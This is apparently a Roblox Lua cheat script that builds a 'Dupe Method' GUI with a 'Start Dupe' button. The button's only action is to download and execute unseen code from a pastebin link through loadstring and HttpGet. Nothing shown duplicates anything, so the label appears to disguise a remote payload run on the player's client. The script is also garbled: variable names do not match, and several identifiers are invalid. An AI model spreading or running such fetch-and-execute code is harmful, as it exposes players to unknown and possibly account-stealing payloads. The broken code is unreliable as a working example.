local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local DupeMethodMadeByShаdow#1427 = Instance.new("TextLabel")
local _10Minutes = Instance.new("TextButton")
local _20Minutes = Instance.new("TextButton")
local _30Minutes = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
main.Position = UDim2.new(0.0659062043, 0, 0.186878726, 0)
main.Size = UDim2.new(0, 260, 0, 260)
main.Active = true
main.Draggable = true

DupedMethodMadeByPr4ston.Name = "Duped Method | Made By Pr4ston"
DupedMethodMadeByPr4ston.Parent = main
DupedMethodMadeByPr4ston.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
DupedMethodMadeByPr4ston.Position = UDim2.new(0.399116307, 0, 0.33975932, 0)
DupedMethodMadeByPr4ston.Size = UDim2.new(0, 260, 0, 44)
DupedMethodMadeByPr4ston.Font = Enum.Font.SourceSans
DupedMethodMadeByPr4ston.Text = "Dupe Method | Made By Shаdow#1427"
DupedMethodMadeByPr4ston.TextColor3 = Color3.fromRGB(15, 15, 15)
DupedMethodMadeByPr4ston.TextSize = 22.000

Start Dupe.Name = "Start Dupe"
Start Dupe.Parent = main
Start Dupe.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
Start Dupe.Position = UDim2.new(0.115384616, 0, 0.330769241, 0)
Start Dupe.Size = UDim2.new(0, 200, 0, 136)
Start Dupe.Font = Enum.Font.SourceSans
Start Dupe.Text = "Start Dupe"
Start Dupe.TextColor3 = Color3.fromRGB(15, 15, 15)
Start Dupe.TextSize = 47.000
Start Dupe.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://pastebin.com/Tmb7NGFE'))()
end)
